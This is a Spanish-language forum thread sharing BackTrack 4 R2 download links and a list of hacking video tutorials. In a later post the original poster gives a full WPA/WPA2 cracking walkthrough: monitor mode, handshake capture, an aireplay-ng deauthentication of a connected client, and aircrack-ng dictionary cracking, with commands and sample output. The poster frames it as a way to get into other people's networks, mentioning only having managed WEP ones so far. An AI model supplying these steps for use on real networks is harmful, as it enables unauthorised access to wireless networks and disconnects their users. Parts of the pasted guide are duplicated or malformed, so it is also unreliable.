BackTrack 4 R2 Release + Full DVD Tutorial

superpocho

Bovino maduro
#1
hola bakunos aki les traigo la ultima version del popular backtrack 4 r2

BackTrack 4 R2 DVD + Tutorial de lanzamiento completo - 7,67 GB
BackTrack es para todos los públicos de los profesionales de seguridad más inteligente a los recién llegados pronto para el campo de seguridad de la información.
BackTrack promueve una forma rápida y fácil de encontrar y actualizar la base de datos más grande de la colección de herramientas de seguridad al día.
Nuestra comunidad de usuarios amplia de probadores de penetración de expertos en el campo de seguridad de la información, las entidades gubernamentales, tecnología de la información, los entusiastas de la seguridad, y las personas nuevas a la comunidad de seguridad. De votos de todos los sectores y niveles de habilidad nos permite desarrollar una verdadera solución que se adapta a todo el mundo y supera con creces cualquier cosa que se haya desarrollado tanto comercial como de libre disposición.
Ya sea que esté de hacking inalámbrico, la explotación de los servidores, realizando una evaluación de la aplicación web, el aprendizaje o de ingeniería social-a un cliente, BackTrack es la ventanilla única para todas sus necesidades de seguridad.
BackTrack 4 Cambios final
* Kernel 2.6.30.9 - Con la fragmentación de los parches, etc
* Meta-paquetes eliminados de la imagen base. todavía se puede instalar desde el repositorio.
* Varios "IEEE802.11 oldies controlador inalámbrico" se han añadido para mayor versatilidad.
* Adicional (no inyectables) controladores inalámbricos añadido para mejorar el apoyo
* La gran número de cambios de herramientas
* La gran número de correcciones de errores
* Simplificación de las actualizaciones del kernel para futuras actualizaciones
* Repositorios actualizado con frecuencia para las revisiones de seguridad y actualizaciones de la herramienta
BackTrack 4 Final está fuera ya lo largo de esta versión vienen buenas noticias, actualizaciones y novedades. BackTrack 4 ha sido un camino largo y constante, con el lanzamiento de una versión beta del año pasado, decidimos esperar a realizar la liberación de BackTrack 4 Final hasta que fue perfeccionado en cada forma de la manera y forma.
Con esta versión incluye un nuevo kernel, un conjunto de herramientas más grandes y ampliado repositorio, herramientas personalizadas que sólo se puede encontrar en BackTrack, y lo más importante, establece que todos los errores (bueno, más ..) más importantes que nos conocía. Esta versión que hemos recibido un apoyo abrumador de la comunidad y estamos agradecidos a todos los que han contribuido al éxito de este comunicado.
DVD completo Tutorial - Videos 7,67 GB:
Retroceder Hacking DVD Tutoriales completa colección de DVD y vídeos Bono Hacking (un total de 24 episodios).
Incluye
Episodio 1 - Hacking red - Envenenamiento Arp
Episodio 2 - Hacking Wireless - Cracking WEP
Episodio 3 - Hacking Wireless - deauth
Episodio 5 - Bloqueo de Recogida - Key Bump
Episodio 6 - phone phreaking - Caja Beige
Episodio 7 - phone phreaking / Hacking red - Sniffing VOIP
Episodio 8 - Recogida de bloqueo - Las cuñas de bricolaje Candado
Episodio 9 - Recogida de bloqueo - Mult-Disco Seguros Combo
Episodio 10 - Conceptos básicos sobre Hacking - MD5
Episodio 11 - Hacking Web - Inyección SQL
Episodio 12 - Conceptos básicos sobre Hacking - Backtrack
Episodio 13 - Hacking Web - XSS
Episodio 14 - Permanecer Seguro - túnel SSH
Episodio 15 - Modding - softmod Xbox
Episodio 16 - Hacking Wireless - Cracking WPA
Episodio 17 - Arranque Triple - Windows, Backtrack, y Ubuntu
Episodio 18 - Password Cracking Local
Episodio 19 - Bloqueo Fundamentos Picking
Episodio 20 - Ettercap
Episodio 21 - Túnel XSS
Episodio 22 - Playstation 2 softmod
Episodio 23 - Actualización de Craqueo WEP
Episodio 24 - El acceso hotspot de derivación de los controles
Inicio: http://sevno.org/
Descargar
http://www.filesonic.com/file/188769731/BackTrack+4+R2+Release_sevno.part01.rar
http://www.filesonic.com/file/188834981/BackTrack+4+R2+Release_sevno.part02.rar
http://www.filesonic.com/file/188855741/BackTrack+4+R2+Release_sevno.part03.rar
http://www.filesonic.com/file/188879341/BackTrack+4+R2+Release_sevno.part04.rar
http://www.filesonic.com/file/188904811/BackTrack+4+R2+Release_sevno.part05.rar
http://www.filesonic.com/file/188922581/BackTrack+4+R2+Release_sevno.part06.rar
http://www.filesonic.com/file/188949031/BackTrack+4+R2+Release_sevno.part07.rar
http://www.filesonic.com/file/188971401/BackTrack+4+R2+Release_sevno.part08.rar
http://www.filesonic.com/file/188994761/BackTrack+4+R2+Release_sevno.part09.rar
http://www.filesonic.com/file/189009091/BackTrack+4+R2+Release_sevno.part10.rar
http://www.filesonic.com/file/189028551/BackTrack+4+R2+Release_sevno.part11.rar
http://www.filesonic.com/file/189052341/BackTrack+4+R2+Release_sevno.part12.rar
http://www.filesonic.com/file/189082121/BackTrack+4+R2+Release_sevno.part13.rar
http://www.filesonic.com/file/189154121/BackTrack+4+R2+Release_sevno.part14.rar
http://www.filesonic.com/file/189150241/BackTrack+4+R2+Release_sevno.part15.rar
http://www.filesonic.com/file/189247081/BackTrack+4+R2+Release_sevno.part16.rar

usar el jdowloader porque si esta pesado casi 8 gb pero vale la pena espero que sea mas facil hackear wap 2 con el video tutorial que trae descargen y prueben espero sus comentarios y como les fue con las auditorias ya que solo he podido entrar en las wep:chavo:

apurense a bajar ya que los links solo duran 30 dias :chommy:
 
#2
oye esta chido tu aporte pero esta ria bueno que fuera por video tutorial XD para no hacerse muy pesado a mi me interesa el video tutorial saludos y gracias de nuevo XD y descargando XD haber que tal si tienes el link de solo el video tutorial rolalo XD
 

ky0x

Bovino maduro
#4
Muchas gracias por compartirlo y sobre todo el tiempo que te tomaste para subir los links, ya q a veces se encuentran saturados los links q te dan en la pagina de BT4 o de plano te dejan colgados


Bajando y probando
 

snick05268

Bovino maduro
#5
si esta muy saturado lo pueden descargar desde su pagina oficial y aprovechen bien esta heraamineta de hackeo gracias por el aporte
 
#7
tutorial

Muchas gracias por el aporte aunque mi sugerencia es que el tutorial lo puedas colocar en un enlace por separado ya que por ejemplo en mi caso ya tengo la distribucion backtrack4 R2 descargada, gracias.
 

emperador12

Bovino maduro
#8
gracias por el aporte pero al momento de querer descargar con el jdown me dice que de los 16 links estan fuera de servicio 15 y el ultimo es el winamp ? que onda
 

superpocho

Bovino maduro
#9
mas info como hackear con john the ripper sin tener diccionarios
El objetivo es capturar el handshake WPA/WPA2 y usarlo con aircrack-ng para obtener la clave pre-compartida.

Esto se puede hacer de forma activa o pasiva. “Activa” significa que podemos acelerar el proceso deautenticando a un cliente wireless. “Pasiva” significa que podemos esperar a que un cliente wireless se autentifique en la red WPA/WPA2. La ventaja de la forma pasiva es que no necesitamos inyectar y por lo tanto podremos utilizarla desde Windows.

Aquí estań los pasos que vamos a seguir:

1.Colocar la interface wireless en modo monitor y especificar el canal del AP
2.Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el handshake
3.Usar aireplay-ng para deautentificar a un cliente conectado
4.Ejecutar aircrack-ng para obtener la clave pre-compartida usando ese handshake

Paso 1 - Colocar la interface wireless en modo monitor y especificar el canal del AP

El propósito de este paso es colocar la tarjeta en el modo denominado modo monitor. En este modo la tarjeta wireless puede escuchar y capturar cualquier paquete en el aire. En cambio, en el modo normal la tarjeta solo “escuchará” los paquetes que van destinados a la misma. Escuchando todos los paquetes, podremos más adelante capturar los 4 paquetes que forman el handshake WPA/WPA2. Y opcionalmente tambien podremos deautenticar a un cliente wireless

Primero para la interface ath0 escribiendo

airmon-ng stop ath0

El sistema nos responderá


Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)[/
align]


Escribe “iwconfig” para comprobar que no hay mas interfaces athX. Deberás ver algo como esto:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions


Si queda alguna interface athX, para cada una de ellas. Cuando termines, ejecuta “iwconfig” para verificar que ya no queda ninguna.

Ahora, escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9:

Si queda alguna interface athX, para cada una de ellas. Cuando termines, ejecuta “iwconfig” para verificar que ya no queda ninguna.

Ahora, escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9:

airmon-ng wifi0 9

Nota: En este comando usamos “wifi0” en lugar de nuestra interface “ath0”. Esto se debe a que estamos usando los drivers madwifi-ng y no madwifi-old.

El sistema nos responderá:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)



Puedes observar que “ath0” aparece colocada en modo monitor.

Para confirmar que la interface está bien configurada, escribimos “iwconfig”.

El sistema nos responderá:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSI:eek:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:eek:ff RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en “Access Point” vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará.

Para ver la correspondencia entre frecuencia y canal, mira: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels y selecciona “Wifi Channel Selection and Channel Overlap” Así obtendrás la frecuencia para cada canal.

Paso 2 - Iniciar airodump-ng para capturar el handshake

El propósito de este paso es ejecutar airodump-ng para capturar los 4 paquetes del handshake en el momento que un cliente se autentifica con el AP en el que estamos interesados

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Donde:

■-c 9 es el canal de la red wireless
■- -bssid 00:14:6C:7E:40:80 es la dirección MAC del AP. Esto elimina el tráfico de otras redes.
■-w psk es el nombre del archivo en el que guardaremos los IVs.
■ath0 es el nombre de nuestra interface.
Importante: NO uses la opción ”- -ivs”. Debes capturar los paquetes enteros.

A continuación puedes ver una imagen en la que se vé un cliente wireless conectado a la red:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5
D
B:C2 35 0 116


Y ahora una imagen de la red sin clientes conectados:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes


Paso 3 - Usar aireplay-ng para deautentificar a un cliente conectado

Este paso es opcional. Solo es necesario realizar este paso si optas por acelerar activamente todo el proceso. El requisito necesario es que se encuentre asociado actualmente con el AP algún cliente wireless. Si no hay ningún cliente wireless asociado al AP, lee el siguiente paso del manual y ten paciencia. No es necesario decir, que si más tarde aparece algún cliente wireless, puedes volver atrás y seguir este apartado del manual.

Lo que se hace en este paso es enviar un mensaje al cliente wireless para desasociarlo con el AP. Entonces el cliente wireless se reautenticará con el AP. En la reautenticacion se generarán los 4 paquetes de autenticacion (handshake) en los que estamos interesados en capturar. Despues los usaremos para intentar obtener la clave precompartida WPA/WPA2.

Prestando atención a la salida del comando airodump-ng del paso anterior, podemos determinar el cliente que se encuentra conectado actualmente. Necesitamos su dirección MAC para el siguiente comando. Abre otra consola y escribe

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5
D
B:C2 ath0


Donde:

■-0 significa deautenticación
■1 es el número de deautenticaciones enviadas (puedes enviar infinitas si lo deseas)
■-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
■-c 00:0F:B5
D
B:C2 es la dirección MAC del cliente que queremos deautenticar
■ath0 es el nombre de nuestra interface
A continuación puedes ver la salida del comando

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

Paso 4 - Ejecutar aircrack-ng para obtener la clave pre-compartida

El propósito de este paso es conseguir la clave WPA/WPA2 precompartida. Para hacer esto, se necesita un diccionario de posibles palabras. Básicamente, aircrack-ng comprueba cada una de esas palabras para mirar si coincide con la clave.

Hay un pequeño diccionario que se incluye en la suite aircrack-ng - “password.lst”. En el Wiki FAQ puedes encontrar una larga lista de diferentes diccionarios. Se puede usar John the Ripper (JTR) para construir un diccionario propio y despues usarlo con aircrack-ng.

Abre otra consola y escribe:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Donde:

■-w password.lst es el nombre del archivo del diccionario. Recuerda que tienes que especificar la ruta completa del archivo si no se encuentra en el mismo directorio.
■*.cap es el nombre del grupo de archivos que contienen los paquetes capturados. Date cuenta que en este caso usamos el comodín * para incluir varios archivos

Esta es la salida cuando se encuentra algún handshake

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target


En este punto, aircrack-ng intentará encontrar la clave. Dependiendo de la velocidad de la CPU y del tamaño del diccionario, este proceso puede llevar bastante tiempo, incluso días.

A continuación puedes ver que ocurre cuando averigua la clave precompartida

Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
epero les sirva la info ami si me funciono
con una red wap otras se quedo colgado
hay que seguir probando​
 
Arriba